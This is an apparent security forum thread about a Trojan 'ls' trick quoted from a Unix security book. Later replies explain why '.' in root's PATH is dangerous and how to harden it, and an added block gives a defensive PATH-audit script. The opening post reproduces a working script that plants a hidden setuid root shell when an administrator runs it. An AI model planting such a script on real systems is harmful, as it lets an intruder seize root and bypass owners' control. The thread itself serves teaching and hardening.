
Thread: unix r00t

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    unix r00t

    Practical Unix and Internet Security, page 88, discusses a scenario where the author needed to get the root password of someone who allowed him to get root access on that PC but declined to give the root password for some reason.

    he writes:
    "first we create an executable shell file ls in current directory:
    #!/bin/sh
    cp /bin/sh ./stuff/junk/.superdude
    chmod 4555 ./stuff/junk/.superdude
    rm -f $0
    exec /bin/ls ${1+"$@"}

    "

    ......superdude is supposed to be root.
    Then he tricks the administrator into running su to root, getting into the current directory and executing the ls command; the fake ls file is executed because it is in the current directory.
    Anyway, I was just wondering: if he had root access to that PC, did he really need to do that? After all, it is just a trick. I have heard that there is some way (not a password cracker) to get (or change) the Unix password, provided that you have access to the system as root but don't know the root password.
    nobody is perfect i am nobody

  2. #2
    AO übergeek phishphreek
    Join Date
    Jan 2002
    Posts
    4,325
    If you have access to the system as root, but don't know the root password then you can edit the /etc/shadow file to remove the encrypted password. Then you can set the password to whatever you want. This method is also used to reset the root password using single user mode at boot.

    That is why you should never stay logged in as root. You really don't need to log on as root anyway.
    Just su when you need root privileges.

    Then again, if you have physical access to a computer... the computer can always be compromised.

    Please note: I have little experience with Unix. I use Linux. Should be the same though?
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you've saved, how much you haven't smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  3. #3
    You see they got a root shell out of it.
    . means your path, when he initiated su to root it assumed their path, the file in the directory they modified.

    I scanned the page in the book so everyone could read the whole scenario.

    http://img126.exs.cx/my.php?loc=img126&image=612.jpg

    So if you're on page 88 you've already read about some of the major flaws in UNIX.

  4. #4
    Senior Member
    Join Date
    Mar 2003
    Posts
    135
    Originally posted here by !mitationRust
    . means your path, when he initiated su to root it assumed their path, the file in the directory they modified.
    Just to clarify, I believe "." refers to the current directory, just like ".." refers to the directory above the current one. If this directory (.--the current one) were placed at the end of the search path variable, then the administrator would have executed the real ls command, not the doctored one, and the "trick" would not have worked. The shell just followed the path already set for it (presumably by the admin).

  5. #5
    Senior Member
    Join Date
    Feb 2004
    Posts
    373
    So if you're on page 88 you've already read about some of the major flaws in UNIX.
    I would like to hear what some of the major flaws with Unix are.

  6. #6
    Originally posted here by devpon
    I would like to hear what some of the major flaws with Unix are.
    You know, I knew I would get a response out of that, I should've left it in the dark.

    You would like to read some of the major flaws? I'm afraid I broke my stick on this dead horse awhile ago, but I'll let catch educate you on some of the flaws. *nix vs. ?, thread is not the same unless it has catch involved.
    Here
    Here
    Here

  7. #7
    Antionline Herpetologist
    Join Date
    Aug 2001
    Posts
    1,165
    That is why you should never stay logged in as root. You really don't need to logon as root anyway.
    Just su when you need root privileges.
    That is exactly why (at least with Linux and the *BSD's), most modern Unices do NOT by default put the current directory (.) in root's path variable. Otherwise, a user could copy the script to every directory he had write access to and sooner or later, root would cd to that directory and run ls.

    Cheers,
    cgkanchi
    Buy the Snakes of India book, support research and education (sorry the website has been discontinued)
    My blog: http://biology000.blogspot.com

  8. #8
    Senior Member
    Join Date
    Feb 2004
    Posts
    373
    but I'll let catch educate you on some of the flaws.
    Enough said.

  9. #9
    Senior Member
    Join Date
    Mar 2003
    Posts
    245
    Couple things to add if I may...

    Any privileged account should never have '.' or '::' in their PATH. Both of these mean `in my current directory'. Watch out for frequent misspellings of commands such as 'mroe', 'passwrd', etc. And pay careful attention to what IFC is set to.

    For root, always use a shell that can set the environment variables as `read-only'. Most implementations of the Korn shell recognize 'typeset -xr VAR' to mean export the variable and set it to read-only.

    UNIX (both commercial and free systems) can be extremely secure, just make sure you don't end up making the box entirely useless in the process.

    -- spurious
    Get OpenSolaris http://www.opensolaris.org/
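
A defensive check for the point made in this thread ('.' or an empty field such as '::' in a privileged account's PATH), added here as an example and not part of any post or of the book. The function name `audit_path` and the finding labels are made up for this illustration; it also flags relative entries and group- or world-writable directories, which goes a little beyond what the posts mention.

```shell
#!/bin/sh
# audit_path PATHSTRING  (hypothetical helper, not from the thread)
# Prints one line per risky entry and returns 1 if any were found, else 0.
audit_path() (
    rest="$1:"      # sentinel colon so the last field, even an empty one, is visited
    pos=0
    findings=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}       # text up to the first colon
        rest=${rest#*:}         # everything after it
        pos=$((pos + 1))
        case $entry in
            "") echo "entry $pos: EMPTY (an empty field is searched as the current directory)" ;;
            .)  echo "entry $pos: DOT (current directory)" ;;
            /*) # absolute entry: risky only if group or others can write to it
                perms=$(ls -ldL "$entry" 2>/dev/null) || continue   # skip missing dirs
                case $perms in
                    d????w*|d???????w*) echo "entry $pos: WRITABLE $entry" ;;
                    *) continue ;;
                esac ;;
            *)  echo "entry $pos: RELATIVE $entry" ;;
        esac
        findings=$((findings + 1))
    done
    [ "$findings" -eq 0 ]
)

# Constructed sample values: a PATH of the kind the thread warns about, then a plain one.
audit_path ".:/usr/bin:/bin" || echo "=> risky entries found"
audit_path "/usr/bin:/bin" && echo "=> nothing flagged"
```

Run it as root with `audit_path "$PATH"` to check the search path the root shell actually uses.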

  10. #10
    Junior Member
    Join Date
    Feb 2004
    Posts
    12
    I just want to state, that I'm reading this book and learned a whole bunch of things and I would recommend it to anyone. Interesting discussion here
    -= There are 10 types of humans:
    o Those who understand something about binary numbers
    o And those who doesn't...=-
